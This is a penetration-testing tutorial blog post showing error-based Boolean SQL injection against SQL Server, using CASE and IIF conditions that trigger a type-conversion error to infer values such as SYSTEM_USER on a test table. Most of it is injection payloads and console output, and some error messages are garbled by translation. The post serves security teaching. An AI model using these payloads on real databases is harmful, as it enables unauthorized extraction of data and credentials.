A SQL Server Conditional Statement Injection Tips

Preface

During injection, you may encounter a situation, that is, there is injection. However, there is no data in the table, which causes you to fail to perform the Boolean injection. So you can use this method to obtain mysql statements case when 1 like 1 then 0 else 2*1e308 end similar effect. The methods used here are both errors that occur when data types are inconsistent and then compared. This forces the Boolean effect to be displayed.

1 1> select * from article;
2 2> go
3 +----+-----------+-----------+
4 | id | title | content |
5 +----+-----------+-----------+
6 | 1 | test title | Test content |
7 | 2 | Test Title 2 | Test content 2 |
8 +----+-----------+-----------+
9 (2 rows affected)
1 # Test table data: users;
2
​3 sql server> select * from users;
4 +----+--------------+----------+
5 | id | username | password |
6 +----+--------------+----------+
7 | 1 | test-user-01 | 123456 |
8 | 2 | test-user-02 | 234567 |
9 +----+--------------+----------+
10 2 rows in set (0.00 sec)
1 sql server> SELECT system_user;
2 +-----------------------+
3 | field1 |
4 +-----------------------+
5 | sa |
6 +-----------------------+
7 1 row in set (0.00 sec)
1 sql server> select db_name();
2 +-----------------------+
3 | field1 |
4 +-----------------------+
5 | test |
6 +-----------------------+
7 1 row in set (0.00 sec)

CASE Conditional Statement

example 1

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE ‘x’ END)

# the right situation
2 1> select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);
3 2> go
4 +----+----------+----------+
5 | id | title | content |
6 +----+----------+----------+
7 | 1 | test title | Test content |
8 +----+----------+----------+
9 (1 rows affected)

SQL :select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE ‘x’ END);

1 # wrong situation
2 1> select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);
3 2> go
4 22018 - [SQL Server]in will varchar value 'x' Convert to data type int failed.

In this way, the forced Boolean result can be achieved.

CASE Conditional Statement

SQL :select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘%sa%’ THEN 1 ELSE ‘x’ END)

1 # Query if SYSTEM_USER is correct
2 1> SELECT
3 *
4 FROM
5 article
6 WHERE
7 id = 1
8 AND 1 = (
9 CASE
10 WHEN SYSTEM_USER LIKE '%sa%' THEN
11 1
12 ELSE
13 'x'
14 END
15 );
16 2> go
17 +----+----------+----------+
18 | id | title | content |
19 +----+----------+----------+
20 | 1 | test title | Test content |
21 +----+----------+----------+
22 (1 rows affected)

SQL :select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘% aaaaa %’ THEN 1 ELSE ‘x’ END)

1 # Query the case of SYSTEM_USER error
2 1> SELECT
3 *
4 FROM
5 article
6 WHERE
7 id = 1
8 AND 1 = (
9 CASE
10 WHEN SYSTEM_USER LIKE '%aaaaa%' THEN
11 1
12 ELSE
13 'x'
14 END
15 );
16 2> go
17 22018 - [SQL Server]in will varchar in will 'x' Convert to data type int failed.

IIF Conditional Statement

SQL :select * from article WHERE id=1 and 1=IIF(1=1,1,’x’);

1 # the right situation
2 1> select * from article WHERE id=1 and 1=IIF(1=1,1,'x');
3 2> go
4 +----+----------+----------+
5 | id | title | content |
6 +----+----------+----------+
7 | 1 | test title | Test content |
8 +----+----------+----------+
9 (1 rows affected)

SQL :select * from article WHERE id=1 and 1=IIF(1=2,1,’x’);

1 # error case
2 1> select * from article WHERE id=1 and 1=IIF(1=2,1,'x');
3 2> go
4 22018 - [SQL Server]in will varchar value 'x' Convert to data type int failed.

IIF Conditional Statement

# Query if SYSTEM_USER is correct
2 1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%sa%',1,'x');
3 2> go
4 +----+----------+----------+
5 | id | title | content |
6 +----+----------+----------+
7 | 1 | test title| Test content |
8 +----+----------+----------+
9 (1 rows affected)
1 # Query the case of SYSTEM_USER error
2 1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%aaaa%',1,'x');
3 2> go
4 22018 - [SQL Server] Failed to convert varchar value 'x' to data type int.

Originally published at https://tutorialboy24.blogspot.com

--

--

Our mission is to get you into information security. We'll introduce you to penetration testing and Red Teaming. We cover network testing, Active Directory.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
TutorialBoy

TutorialBoy

120 Followers

Our mission is to get you into information security. We'll introduce you to penetration testing and Red Teaming. We cover network testing, Active Directory.